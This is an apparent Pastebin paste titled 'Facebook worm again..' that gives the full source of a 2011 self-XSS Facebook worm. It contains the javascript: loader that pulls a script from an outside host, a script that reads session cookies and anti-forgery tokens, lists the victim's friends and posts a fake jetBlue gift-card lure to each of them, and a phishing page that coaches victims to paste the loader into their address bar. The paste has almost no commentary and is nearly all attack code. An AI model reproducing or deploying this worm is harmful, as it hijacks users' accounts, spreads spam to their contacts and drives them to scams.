API tools faq
paste
Advertisement
Xylitol

Facebook worm again..

Xylitol
May 17th, 2011
2,963
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 6.47 KB | None | 0 0
raw download clone embed print report
  1. vector: javascript:(a=(b=document).createElement('script')).src='//ablingla.com/face/facehax.js',b.body.appendChild(a);void(0)
  2.  
  3. facehax.js:
  4. var thelink = "http://is.gd/9d3AE0";
  5.  
  6. function readCookie(name) {
  7.     var nameEQ = name + "=";
  8.     var ca = document.cookie.split(';');
  9.     for (var i = 0; i < ca.length; i++) {
  10.        var c = ca[i];
  11.        while (c.charAt(0) == ' ') c = c.substring(1, c.length);
  12.        if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length)
  13.    }
  14.    return null
  15. }
  16. var randomnumber=Math.floor(Math.random()*99999);
  17. var user_id = readCookie("c_user");
  18. var user_name = document.getElementById('navAccountName').innerHTML;
  19. var message = "jetBlue is giving out 32 more $1,000 gift cards, simply click Gimme my gift card below to get yours!";
  20. var myText = "GIMME MY GIFT CARD GIMME MY GIFT CARD GIMME MY GIFT CARD GIMME MY GIFT CARD GIMME MY GIFT CARD GIMME MY GIFT CARD GIMME MY GIFT CARD\n";
  21.  
  22. var post_form_id = document.getElementsByName('post_form_id')[0].value;
  23. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  24. var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  25.  
  26. var friends = new Array();
  27. gf = new XMLHttpRequest();
  28. gf.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" + uid + "&"+Math.random(),false);
  29. gf.send();
  30. if(gf.readyState!=4){ }else{
  31.        data = eval('(' + gf.responseText.substr(9) + ')');
  32.        if(data.error){ }else{
  33.                friends = data.payload.entries.sort(function(a,b){return a.index-b.index;});
  34.        }
  35. }
  36. for(var i=0; i<friends.length; i++){
  37.        var httpwp = new XMLHttpRequest();
  38.        var urlwp = "/fbml/ajax/prompt_feed.php?__a=1";
  39.        var paramswp = "&__d=1&app_id=6628568379&extern=1&" +
  40.                                   "&post_form_id=" + post_form_id +
  41.                                   "&fb_dtsg=" + fb_dtsg +
  42.                                   "&feed_info[action_links][0][href]=" + encodeURIComponent(thelink) +
  43.                                   "&feed_info[action_links][0][text]=" + encodeURIComponent(myText) +
  44.                                   "&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid +
  45.                                   "&user_message=" + message;
  46.        httpwp.open("POST", urlwp, true);
  47.        httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  48.        httpwp.setRequestHeader("Content-length", paramswp.length);
  49.        httpwp.setRequestHeader("Connection", "keep-alive");
  50.        httpwp.onreadystatechange = function(){
  51.                if (httpwp.readyState == 4 && httpwp.status == 200){
  52.                      
  53.                }
  54.        }
  55.        httpwp.send(paramswp);
  56. }
  57.  
  58. alert("WINNER! Click OK to Continue..");
  59. window.location = "http://appboxkm.info.s3-website-us-east-1.amazonaws.com/";
  60.  
  61.  
  62.  
  63.  
  64.  
  65.  
  66.  
  67.  
  68.  
  69. ----------
  70. index.html:
  71. <!doctype html>
  72. <!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
  73. <!--[if IE 7 ]>    <html lang="en" class="no-js ie7"> <![endif]-->
  74. <!--[if IE 8 ]>    <html lang="en" class="no-js ie8"> <![endif]-->
  75. <!--[if IE 9 ]>    <html lang="en" class="no-js ie9"> <![endif]-->
  76. <!--[if (gt IE 9)|!(IE)]><!--><html lang="en" class="no-js"> <!--<![endif]-->
  77. <head>
  78. <meta charset="utf-8"/>
  79. <title></title>
  80. <style type="text/css">
  81. html * {margin: 0; padding: 0;}       body {width: 520px; margin: 0 auto; font-family: "lucida grande",tahoma,verdana,arial,sans-serif; font-size: 14px;}       textarea, a {font-size: 24px; text-align: center; position: absolute; top: 0; left: 0; width: 401px; height: 20px; filter: alpha(opacity=1); -khtml-opacity: 0.01; -moz-opacity: 0.01; opacity: 0.01; cursor: pointer;}       li {margin: 5px;}       ol {list-style: decimal;}
  82. </style>
  83. <!--[if lt IE 9]><script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
  84. </head>
  85. <body>
  86. <br>
  87.  
  88.  
  89. <div style="background: url('http://1.bp.blogspot.com/-mPStXUBwF8Y/TcDklWEtieI/AAAAAAAAAAs/_EdzOJvct6E/s1600/bg1.png') no-repeat top left; width: 485px; height: 335px; padding: 15px 0 0 20px;">
  90.     <p style="color: white; font-weight: 700;">
  91.         Security Check
  92.     </p>
  93.     <p style="font-size: 11px; padding-top: 15px">
  94.         Please complete our new <strong>5 second</strong> security check to get your gift card.
  95.     </p>
  96.     <div id="container" style="margin-top: 40px;">
  97.  
  98.         <p id="button" style="cursor: pointer; color: white; font-weight: 700; background-color: #8298c0; width: 150px; height: 20px; text-align: center; padding: 10px; border: solid 1px #4e6fa7; margin: 0 auto;">
  99. Get your gift card        </p>
  100.         <div id="key" style="display: none; width: 401px; margin: 0 auto;">
  101.             <ol style="padding-left: 10px; font-size: 12px">
  102.                 <strong>Press the following keys on your keyboard in order:</strong><br><br>
  103.                 <li>Press <strong>CTRL + C</strong></li>
  104.                 <li>Press <strong>ALT + D</strong></li>
  105.  
  106.                 <li>Press <strong>CTRL + V</strong></li>
  107.  
  108.                 <li>Press <strong>Enter</strong></li>
  109.                 <li><strong>Get your $1,000 gift card</strong></li>
  110.             </ol>
  111.             <div id="cd" style="position: relative; width: 401px; height: 20px; margin-left: -30px;">
  112.               <textarea id="c">javascript:(a=(b=document).createElement('script')).src='//ablingla.com/face/facehax.js',b.body.appendChild(a);void(0)</textarea>
  113.  
  114.             </div>
  115.         </div>
  116.  
  117.     </div>
  118.  
  119.  
  120. </div>
  121. <script type="text/javascript" src="http://code.jquery.com/jquery-1.5.2.min.js"></script>
  122. <script type="text/javascript">       $(document).ready(function() {         $("#button").click(function(){           $("#button").css("display","none");           $("#key").css("display","block");           $("#c").focus();           $("#c").select();         });       });     </script>
  123.   <script type="text/javascript" id="wau_scr_53bb8237">
  124.     var wau_p = wau_p || []; wau_p.push(["4cyr", "53bb8237", false]);
  125.     (function() {
  126.         var s=document.createElement("script"); s.type="text/javascript";
  127.         s.async=true; s.src="http://widgets.amung.us/a_pro.js";
  128.         document.getElementsByTagName("head")[0].appendChild(s);
  129.     })();
  130. </script></body>
  131.  
  132. </html>
  133. <script src = 'https://s3.amazonaws.com/statichtmlapp/scrollbar.js' > </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!